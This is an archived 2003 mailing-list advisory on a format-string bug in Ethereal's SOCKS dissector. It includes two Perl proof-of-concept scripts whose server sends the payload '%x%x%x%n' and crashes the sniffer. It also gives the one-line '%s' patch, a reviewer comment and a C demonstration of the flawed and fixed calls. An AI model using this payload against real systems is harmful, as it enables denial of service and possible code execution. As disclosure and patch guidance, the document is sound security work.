Vulnwatch mailing list archives

Ethereal Advisory (Guninski #60)


From: Steve <steve () vulnwatch org>
Date: Sat, 8 Mar 2003 16:20:44 +0000 (GMT)

Georgi Guninski released an advisory this morning on Ethereal.  Here are
the important parts of that advisory:

Steve Manzuik
Moderator - VulnWatch

================================================

Description:
Ethereal is a sniffer. According to www.ethereal.com its purpose is:
"Sniffing the glue that holds the Internet together"
There is a format string bug in it which is confirmed to be a DoS and
can probably lead to execution of code (the difficulty comes from the fact
that some characters are escaped).

Details:
The problem seems to be in: "packet-socks.c" line 910 of 1180
-----
    proto_tree_add_text( tree, tvb, offset, linelen,
                                     format_text(data, linelen));
------
The format mask is missing.
How to reproduce on localhost:

start raw3sv.pl (dummy socks server, attached)
start ethereal on loopback, update packets in real time.
start sockcl.pl (attached, does socks ping, without argument connects to
localhost)
wait about 5 seconds.
go to ethereal and select the line "Sock5.....Ping Req Results"
result: SEGV.

---raw3sv.pl----


#!/usr/bin/perl
# Written by Georgi Guninski
# Dummy SOCKS server for Ethereal: answers the client's handshake, then
# sends a line carrying format directives that the SOCKS dissector hands
# to proto_tree_add_text() as its format string.
use strict;
use IO::Socket;
#local port
my $port = 1080;

#redirect to

# SOCKS5 method-selection reply (version 5, method 0 = no authentication)
my $msg="\x05\x00";
# SOCKS5 command reply (version 5, status 0 = succeeded)
my $repl="\x05\x00\x00\x00\x02aa";

# the payload: "m$sux%x%x%x%n" -- each %x consumes a stack word and %n
# writes to memory; the advisory's observed result is a SEGV
my $pi="m\$sux\%x\%x\%x\%n";


my $server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";

print "Dummy socks server for ethereal\nListening on localhost:${port}\n";

# serve a single client: handshake reply, command reply, payload, then exit
my $client;
while ($client = $server->accept()) {
 print "Client connected.\n";
 print "Sending...";
 sleep(1);
#    while(<$client>) {print $_;}
 print $client "$msg";
 print "OK\n";
 sleep(1);
 print $client "$repl";
 sleep(1);
 print $client "$pi";
 close($client);
 exit(0);
}

----------------

----sockcl.pl------------

#!/usr/bin/perl -w
# Written by Georgi Guninski
# SOCKS client: performs the greeting and sends a "ping" command so that
# the exchange, and the server's payload reply, shows up in Ethereal.
use strict;
use IO::Socket;
my $host= $ARGV[0] || "localhost";
my $port=1080;

print "host=${host}\n";

my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP") || die("Unable to connect");

print "Start\n";

# SOCKS5 greeting, then the command Ethereal's dissector labels "Ping Req"
my $logcmd="\x05\x00\x00";
my $pingcmd="\x05\x80\x00\x01\x01\x01\x01\x01\x01\x01";

print $socket $logcmd;
my $x;
sysread($socket,$x,2);   # consume the 2-byte method-selection reply
#sleep(1);
print $socket $pingcmd;
sleep(5);                # keep the connection open until the payload arrives

print "Done\n";

----------------


Workaround/Solution:
Upgrade to 0.9.10 or apply the following patch:
------------------
--- packet-socks.c.orig    2002-08-29 03:40:03.000000000 +0300
+++ packet-socks.c    2003-02-25 15:52:14.000000000 +0200
@@ -908,7 +908,7 @@
                          linelen = lineend - data;

                                 proto_tree_add_text( tree, tvb, offset,
linelen,
-                                   format_text(data, linelen));
+                                   "%s",format_text(data, linelen));
                                 offset += linelen;
                                 data = lineend;
                             }
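Review bot: the context lines of this hunk have been re-wrapped by the mailer (`proto_tree_add_text( tree, tvb, offset,` / `linelen,` is a single line in the source quoted in the Details section), so patch(1) will reject the hunk as-is; apply the one-line change by hand by inserting `"%s",` in front of `format_text(data, linelen)`. The change itself is the right fix: format_text() returns attacker-controlled packet data, which must only ever be an argument, never the format. Worth auditing the remaining proto_tree_add_text() calls in this dissector for the same pattern, and building with -Wformat-security so a non-literal format with no further arguments is flagged at compile time.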
------------------

Vendor status:
Notified on Tue, 25 Feb 2003
http://www.ethereal.com/appnotes/enpa-sa-00008.html
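The following is an added C example, not part of the advisory or of Ethereal's source. It reproduces the bug pattern from the Details section in a stand-alone program: `add_text()` is a stand-in for proto_tree_add_text() (assumption: it renders into a buffer rather than a protocol-tree item), `format_text()` is a stand-in for Ethereal's function of the same name that escapes non-printable bytes (which is the escaping the Description refers to), and `render_vulnerable()` / `render_fixed()` are the line before and after the patch. `has_format_directive()` is a hypothetical helper, added here as the check a practitioner would run over captured data. The vulnerable path is probed with "%%" rather than the advisory's "%x%x%x%n" payload so the demonstration stays free of undefined behaviour.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/*
 * Stand-in for Ethereal's proto_tree_add_text(): a printf-style sink.
 * ASSUMPTION: the real function renders into a protocol-tree item; this
 * one renders into a caller-supplied buffer so the result can be inspected.
 */
static int add_text(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return n;
}

/*
 * Minimal stand-in for Ethereal's format_text(): printable bytes pass
 * through, everything else is escaped as \ooo. This is the escaping the
 * advisory mentions: NUL bytes and raw addresses cannot be placed in the
 * string, which is what makes a %n write hard to aim, but '%' is printable
 * and passes through untouched.
 */
static const char *format_text(const unsigned char *data, size_t len)
{
    static char buf[512];
    size_t o = 0;
    for (size_t i = 0; i < len && o + 5 < sizeof buf; i++) {
        if (isprint(data[i]))
            buf[o++] = (char)data[i];
        else
            o += (size_t)snprintf(buf + o, sizeof buf - o, "\\%03o",
                                  (unsigned)data[i]);
    }
    buf[o] = '\0';
    return buf;
}

/* The pattern at packet-socks.c line 910 before the fix: the escaped
 * packet data itself becomes the format string. */
static int render_vulnerable(const unsigned char *data, size_t len,
                             char *out, size_t outlen)
{
    return add_text(out, outlen, format_text(data, len));
}

/* The fixed pattern: a literal "%s" format, packet data only as an argument. */
static int render_fixed(const unsigned char *data, size_t len,
                        char *out, size_t outlen)
{
    return add_text(out, outlen, "%s", format_text(data, len));
}

/* Hypothetical helper: does a string carry a conversion directive, i.e. a
 * '%' that is not part of a literal "%%"? Returns 1 if so, else 0. */
static int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { s++; continue; }   /* "%%" is a literal percent */
        return 1;
    }
    return 0;
}

int main(void)
{
    char out[256];

    /* Constructed input: "%%" consumes no argument, so it shows the data
     * being parsed as a format without the undefined behaviour that the
     * advisory's "%x%x%x%n" payload relies on. */
    const unsigned char probe[] = "50%% off";
    render_vulnerable(probe, sizeof probe - 1, out, sizeof out);
    printf("vulnerable: %s\n", out);        /* the "%%" collapsed to "%" */
    render_fixed(probe, sizeof probe - 1, out, sizeof out);
    printf("fixed:      %s\n", out);        /* data reproduced verbatim */

    /* The payload raw3sv.pl sends, fed only to the fixed path and the checker:
     * through the vulnerable path each %x would read a stack word and %n
     * would write to memory. */
    const unsigned char payload[] = "m$sux%x%x%x%n";
    render_fixed(payload, sizeof payload - 1, out, sizeof out);
    printf("fixed:      %s  directives=%d\n", out, has_format_directive(out));

    /* Escaping: the SOCKS bytes 05 00 are not printable and come out as \005\000. */
    const unsigned char hdr[] = {0x05, 0x00, 'a', 'b'};
    printf("escaped:    %s\n", format_text(hdr, sizeof hdr));
    return 0;
}
```

If `add_text()` is declared with `__attribute__((format(printf, 3, 4)))` and the file is built with `-Wformat-security`, GCC flags the call in `render_vulnerable()` (a non-literal format with no further arguments) at compile time, which is the cheapest way to find the remaining instances of this pattern in a dissector.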
